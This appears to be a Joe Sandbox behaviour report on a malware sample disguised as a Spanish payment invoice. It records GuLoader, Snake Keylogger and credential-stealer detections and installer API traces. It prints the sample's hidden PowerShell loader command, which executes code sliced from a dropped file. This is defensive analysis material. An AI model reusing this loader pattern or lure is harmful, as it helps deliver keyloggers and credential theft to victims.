Commandline:	"C:\Users\user\Desktop\FACTURA DE PAGO.exe"
Imagebase:	0x400000
File size:	880'319 bytes
MD5 hash:	DE02502F79BC183714A9DFE879831170
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:16:14
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"
Imagebase:	0xbd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1914582277.0000000008D6C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:16:14
Start date:	21/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:16:36
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x200000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23%
Total number of Nodes:	1250
Total number of Limit Nodes:	40

Executed Functions

Function 0040310F Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403134
GetVersion.KERNEL32 ref: 0040313A
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
#17.COMCTL32(00000007,00000009), ref: 00403185
OleInitialize.OLE32(00000000), ref: 0040318C
SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
GetCommandLineA.KERNEL32(Trehagen Setup,NSIS Error), ref: 004031BD
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",00000000), ref: 004031D0
CharNextA.USER32(00000000,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",00000020), ref: 004031FB
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
DeleteFileA.KERNELBASE(1033), ref: 0040335E

Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5

OleUninitialize.OLE32(?), ref: 0040340C
ExitProcess.KERNEL32 ref: 0040342D
GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
OpenProcessToken.ADVAPI32(00000000), ref: 00403551
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
ExitProcess.KERNEL32 ref: 004035CF

Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580

Strings

TEMP, xrefs: 0040333D
1033, xrefs: 00403359
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna, xrefs: 004033E9
", xrefs: 00403220
Trehagen Setup, xrefs: 004031B3
.tmp, xrefs: 00403454
C:\Users\user\Desktop\FACTURA DE PAGO.exe, xrefs: 004034EA
`Kt, xrefs: 00403336
C:\Users\user\Desktop, xrefs: 0040345F, 00403464, 00403490
SeShutdownPrivilege, xrefs: 00403563
\Temp, xrefs: 0040330F
NSIS Error, xrefs: 004031AE
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 004032DD, 004033DE, 00403488, 00403491
UXTHEME, xrefs: 00403157, 0040315C, 00403162
~nsu, xrefs: 00403438
Low, xrefs: 0040332B
C:\Users\user\AppData\Local\Temp\, xrefs: 004032ED, 004032F2, 00403308, 00403314, 00403323, 00403330, 0040333C, 00403344, 0040343D, 0040344E, 00403459, 00403465, 00403472, 00403481, 00403530
Error launching installer, xrefs: 004033C4
TMP, xrefs: 00403345
"C:\Users\user\Desktop\FACTURA DE PAGO.exe", xrefs: 004031C3, 004031C9, 00403382

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\FACTURA DE PAGO.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA DE PAGO.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Trehagen Setup$UXTHEME$\Temp$`Kt$~nsu
API String ID: 3329125770-178197675
Opcode ID: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
Opcode Fuzzy Hash: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

Function 004048C5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 004048DD
GetDlgItem.USER32(?,00000408), ref: 004048E8
GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
LoadBitmapA.USER32(0000006E), ref: 00404945
SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
DeleteObject.GDI32(00000000), ref: 004049BB
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
ShowWindow.USER32(?,00000005), ref: 00404B14
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
ImageList_Destroy.COMCTL32(?), ref: 00404CE4
GlobalFree.KERNEL32(?), ref: 00404CF4
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
ShowWindow.USER32(?,00000000), ref: 00404E93
GetDlgItem.USER32(?,000003FE), ref: 00404E9E
ShowWindow.USER32(00000000), ref: 00404EA5

Strings

N, xrefs: 00404B4F
M, xrefs: 00404A6E
, xrefs: 00404E7D

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58

Function 00405D51 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,00429048,00000000,00404F80,00429048,00000000), ref: 00405E02
GetSystemDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E7D
GetWindowsDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E90
SHGetSpecialFolderLocation.SHELL32(?,0041C205), ref: 00405ECC
SHGetPathFromIDListA.SHELL32(0041C205,Space required: ), ref: 00405EDA
CoTaskMemFree.OLE32(0041C205), ref: 00405EE5
lstrcatA.KERNEL32(Space required: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
lstrlenA.KERNEL32(Space required: ,?,00429048,00000000,00404F80,00429048,00000000), ref: 00405F59

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E4C
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405F01
Space required: , xrefs: 00405D78, 00405E4A, 00405E67, 00405E7C, 00405E8F, 00405EAB, 00405ED6, 00405F06, 00405F0C, 00405F24, 00405F37, 00405F52, 00405F58, 00405F63, 00405F8D

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$Space required: $\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1002770640
Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E

Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
FindClose.KERNEL32(00000000), ref: 00405738

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
\*.*, xrefs: 0040563C
"C:\Users\user\Desktop\FACTURA DE PAGO.exe", xrefs: 004055D1

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3189792215
Opcode ID: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
Opcode Fuzzy Hash: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E

Function 00406033 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(74DF3410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
FindClose.KERNEL32(00000000), ref: 0040604A

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE

Function 00403A41 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
ShowWindow.USER32(?), ref: 00403A9A
DestroyWindow.USER32 ref: 00403AAE
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
GetDlgItem.USER32(?,?), ref: 00403AEB
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
IsWindowEnabled.USER32(00000000), ref: 00403B06
GetDlgItem.USER32(?,00000001), ref: 00403BB4
GetDlgItem.USER32(?,00000002), ref: 00403BBE
SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
GetDlgItem.USER32(?,00000003), ref: 00403CCF
ShowWindow.USER32(00000000,?), ref: 00403CF0
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
EnableWindow.USER32(?,?), ref: 00403D1D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
EnableMenuItem.USER32(00000000), ref: 00403D3A
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
lstrlenA.KERNEL32(00429868,?,00429868,Trehagen Setup), ref: 00403D8E
SetWindowTextA.USER32(?,00429868), ref: 00403D9D
ShowWindow.USER32(?,0000000A), ref: 00403ED1

Strings

Trehagen Setup, xrefs: 00403D7F

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Trehagen Setup
API String ID: 3282139019-262474160
Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

Function 004036AF Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5

lstrcatA.KERNEL32(1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",00000000), ref: 0040372A
lstrlenA.KERNEL32(Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,74DF3410), ref: 0040379F
lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
GetFileAttributesA.KERNEL32(Space required: ), ref: 004037BD
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian), ref: 00403806

Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A

RegisterClassA.USER32(0042DBA0), ref: 00403843
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
ShowWindow.USER32(00000005,00000000), ref: 004038C6
GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
RegisterClassA.USER32(0042DBA0), ref: 00403908
DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927

Strings

1033, xrefs: 004036CF, 00403725
RichEdit20A, xrefs: 004038EA, 004038F0
Control Panel\Desktop\ResourceLocale, xrefs: 004036E3
.exe, xrefs: 004037AC
.DEFAULT\Control Panel\International, xrefs: 00403715
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 00403739, 00403741, 004037D9, 004037DF, 004037EF
RichEd32, xrefs: 004038DA
C:\Users\user\AppData\Local\Temp\, xrefs: 004036B4
_Nb, xrefs: 00403822, 0040388A
Space required: , xrefs: 0040376D, 00403775, 00403782, 004037CC, 004037D2
RichEdit, xrefs: 004038F9
RichEd20, xrefs: 004038CC
"C:\Users\user\Desktop\FACTURA DE PAGO.exe", xrefs: 004036B3

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\FACTURA DE PAGO.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Space required: $_Nb
API String ID: 1975747703-1008607814
Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D

Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402C77
